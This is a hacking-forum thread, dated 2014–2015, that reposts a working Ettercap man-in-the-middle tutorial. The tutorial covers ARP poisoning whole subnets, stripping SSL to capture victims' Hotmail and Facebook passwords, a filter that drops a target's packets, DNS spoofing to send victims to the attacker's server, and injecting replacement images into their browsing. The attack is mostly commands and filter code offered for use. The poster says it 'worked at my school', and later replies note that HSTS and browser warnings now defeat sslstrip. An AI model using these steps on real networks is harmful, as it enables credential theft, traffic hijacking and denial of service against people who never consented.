Author Topic: Ettercap MITM  (Read 5208 times)

0 Members and 1 Guest are viewing this topic.

Offline havox

  • NULL
  • Posts: 3
  • Cookies: 0
    • View Profile
Ettercap MITM
« on: December 03, 2014, 12:51:31 am »
----I DID NOT MAKE THIS TUTORIAL I originally had the tutorial saved from another forum but when the forum was replaced and the tutorial was gone I decided to repost it here so other people could see it----

Only test this on your home network no where else. This guide is more of a reference for launching a man in the middle attack to view the traffic of victims on the network using ettercap along with sslstrip to strip out the important encrypted http traffic. I have done this on wired and wireless LANs using Backtrack5.

To begin we want to enable packet forwarding with this command:
Code: [Select]
echo 1 > /proc/sys/net/ipv4/ip_forwardThen cat the file to see if it is enabled or not. The command output of 1 meaning enabled and 0 meaning not enabled.
Code: [Select]
cat /proc/sys/net/ipv4/ip_forwardWe will now edit our etter.conf configuratin file to use ip tables. In backtrack the file is located.
Code: [Select]
/etc/etter.confUncomment the two commented lines following the statement: if you use iptables by removing the two bottom comment hashes you see below((remove the two bright red things) but make sure to leave the one beside the words "if you use ip tables":
Code: [Select]
#if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
In the same file also change ec_uid and ec_gid numbers to zero so Ettercap runs as admin.
Code: [Select]
[
privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Now use this iptables command to adjust the nat table to route tcp traffic from 80 to 8080:
Code: [Select]
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080Once we have scanned the network for targets and are aware of what IP addresses belongs to what we can begin the poisoning by Becomeing Man in the middle. The following will start ettercap using a range of ip addresses along with the autoadd plugin which means victims who join the network or reconnect to it after you began the scan will be poisoned as well. In this example 192.168.1.1 is the router and ettercap will poison targets up to 192.168.1.5 Also if you are on a wireless network all you have to do is specify ettercap to use your wireless interface with -i wlan0 . wlan0 is my wireless interface.

Code: [Select]
sudo ettercap -Tq -M arp:remote /192.168.1.1-5/ -P autoaddor less specific. This poisons everyone in subnet but be careful this can bring a network to a crawl:
Code: [Select]
ettercap -TqM ARP:REMOTE // //Now tell sslstrip to listen(-l) on p 8080:
Code: [Select]
sslstrip -a -l 8080Now watch people's hotmail,facebook and any other passwords that are suppsoedly protected by ssl roll in as they login. Ettercap will display the output. Now lets dig deeper and manipulate people's packets as they are routed through our computer.


DOS Attacking with Ettercap
First off always re-enable packetforwarding because by default it will turn off when you stop an Ettercap poison. Here is the command:
Code: [Select]
echo 1 > /proc/sys/net/ipv4/ip_forwardNow lets do a DOS attack with ettercap. First thing we want to do is create a file with instructions to drop packets from and to a target host. Make a file called dos.eft
Put these lines of code in it but make sure to change both “TargetIP” fields to that of your victim.
Code: [Select]
if (ip.src == ‘Target IP’ || ip.dst == ‘Target IP’) {
drop();
kill();
msg(“Packet Dropped\n”);
}
Go to the directory you saved your file/script in and compile it into an ettercap filter with this command:
Code: [Select]
etterfilter dos.eft -o dos.efLastly we become man in the middle.
-F specifies what filter we want to use. In this case:
Code: [Select]
it’s dos.efI was targeting 192.168.1.112 so I chose it for this example:
Code: [Select]
ettercap -T -q -F dos.ef -M ARP /192.168.1.112/ // -i (network interface)You should see Ettercap displaying lots of “Packet Dropped” messages. ;-)
DNS Spoofing
(Redirecting victim to sites of our choosing with Ettercap)
Now lets redirect our victim to websites of our choosing. First open a new console and change to our dns configuration file located in the following directory:
Code: [Select]
/usr/share/ettercapEnter the following command to open the configuration file so we can edit it, I use gedit to edit it but you can use many other programs such as gedit:
Code: [Select]
gedit etter.dnsNow see the line that says:
Code: [Select]
microsoft.com A 198.182.196.56That line will redirect the victim to 198.182.196.56 if they attempt to visit microsoft.com

I will give you an example by showing you I can redirect the victim to my own malicious web server running on my IP address (192.168.1.118) if they attempt to visit lets say http://www.facebook.com This example also uses a wildcard (*)We do this by adding the following line:
Code: [Select]
*.facebook.com A 192.168.1.118Save it. Now We can issue the actual command that begins Ettercap and uses the dns spoofing addon:
Code: [Select]
ettercap -T -q -M arp:remote -P dns_spoof //or if we want to target a specific victim IP address use this:
Code: [Select]
ettercap -i yourinterface -T -q -P dns_spoof -M ARP /herevictimslocalip/ //Leave that running. The output that ettercap displays will clearly notify you as people are redirected.
Change pictures the victim sees as they browse the web

(using an Ettercap filter of course)


Ok this section I will teach you how to work with filters in Ettercap and ultimately change the pictures people see in there browser to ones we have selected. To create your own filters you need to learn the basics of how programming languages work but for this example I will give you one that I got from the helpful hackers at greyhat security.

Create/edit a new file using the following command:
Code: [Select]
gedit filter.picCopy and paste the following into it. But you must change the text in red to the url of your own images that you have uploaded using your favorite image uploader such as tinypic.com or imageshack.com
Code: [Select]
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("Modified Accept-Encoding!\n");
}
}

if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}

if (ip.proto == UDP && udp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}
Save and close. In that same console session, run the following command to turn the code into a filter that is readable by Ettercap:
Code: [Select]
etterfilter filter.pic -o filter.efNow we finally issue the Ettercap command that begins the MitmM attack and use the picture filter that we have created:
Code: [Select]
sudo ettercap -T -q -F filter.ef -M arp:remote // -P autoadd
Quote
Note: Remember to enable packet forwarding before using any of attacks I mentioned in this guide. It was mentioned in the first tutorial (ssl strip tute) but here is the command again:

echo 1 > /proc/sys/net/ipv4/ip_forward

TAKEN FROM :http://www.hackcommunity.com/Thread-Ettercap-Man-In-The-MIddle-Attack-SSL-Strip
havox

Offline 0E 800

  • Not a VIP
  • VIP
  • Baron
  • *
  • Posts: 895
  • Cookies: 131
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
    • View Profile
Re: Ettercap MITM
« Reply #1 on: December 03, 2014, 01:09:03 am »
Is this tried and tested?

It sounds like something that was legit... back in 2012.

Original post:
https://web.archive.org/web/20120604015927/http://www.hackcommunity.com/Thread-Ettercap-Man-In-The-MIddle-Attack-SSL-Strip
« Last Edit: December 03, 2014, 01:13:49 am by 0E 800 »
The invariable mark of wisdom is to see the miraculous in the common.

Offline havox

  • NULL
  • Posts: 3
  • Cookies: 0
    • View Profile
Re: Ettercap MITM
« Reply #2 on: December 03, 2014, 01:16:46 am »
It worked at my school  ;D but I haven't really tested it anywhere else.
havox

Offline Kubicek

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
Re: Ettercap MITM
« Reply #3 on: January 29, 2015, 09:21:14 pm »
Yes it works. I do it similarly. But sometimes the antivirus or browser of the victim detects that something is wrong with certificate when browsing https sites.

Offline Avengers

  • Serf
  • *
  • Posts: 21
  • Cookies: -1
  • S.H.I.E.L.D
    • View Profile
Re: Ettercap MITM
« Reply #4 on: October 02, 2015, 10:28:19 pm »
Yes it works. I do it similarly. But sometimes the antivirus or browser of the victim detects that something is wrong with certificate when browsing https sites.

Yeah, the newest versions of Chrome, Firefox and even IE detect this right away.

Offline SeattleInfoSec

  • /dev/null
  • *
  • Posts: 9
  • Cookies: 1
    • View Profile
Re: Ettercap MITM
« Reply #5 on: October 14, 2015, 01:55:08 am »
MITMF seems like a better alternative.

Offline rogue.hackz

  • Peasant
  • *
  • Posts: 55
  • Cookies: 4
    • View Profile
Re: Ettercap MITM
« Reply #6 on: October 23, 2015, 10:03:04 am »
When you're using Ettercap, you don't need this line of code:

Code: [Select]
echo 1 > /proc/sys/net/ipv4/ip_forward
From what I know Ettercap automatically sets up packet forwarding, therefore if you set that line before running ettercap it'll actually disable packet forwarding. I could be wrong so feel free to enlighten me.

Edit:
Btw, sslstrip no longer works due to HSTS although there was another variant implemented in Mitmf earlier this year it still doesn't work on normal browsers like Chrome, Firefox, etc.
« Last Edit: October 23, 2015, 10:17:21 am by rogue.hackz »
"The only true wisdom is in knowing that you know nothing" -Socrates

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Ettercap MITM
« Reply #7 on: October 23, 2015, 07:56:09 pm »
Most websites have fixed SSLstrip.
Won't work against anything signed and properly configured.
Most browsers also cry about SSL warnings , some even block you and offer no option to continue.
Dirt old.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline ram1r3z0

  • Serf
  • *
  • Posts: 29
  • Cookies: 2
    • View Profile
Re: Ettercap MITM
« Reply #8 on: November 01, 2015, 02:55:30 pm »
Yes and know ... ssl strip attack can work in some environments  .


For example : this tool can be used

https://github.com/byt3bl33d3r/MITMf

Offline tolkmeboy

  • NULL
  • Posts: 2
  • Cookies: -1
  • Omnes systemata vulnerabiles
    • View Profile
Re: Ettercap MITM
« Reply #9 on: November 22, 2015, 05:12:30 am »
I would try but when sniff https they say the certifice are untrusted and cannoit acces to the web page

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: Ettercap MITM
« Reply #10 on: November 22, 2015, 06:15:24 am »
Old shit is old

</thread>
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry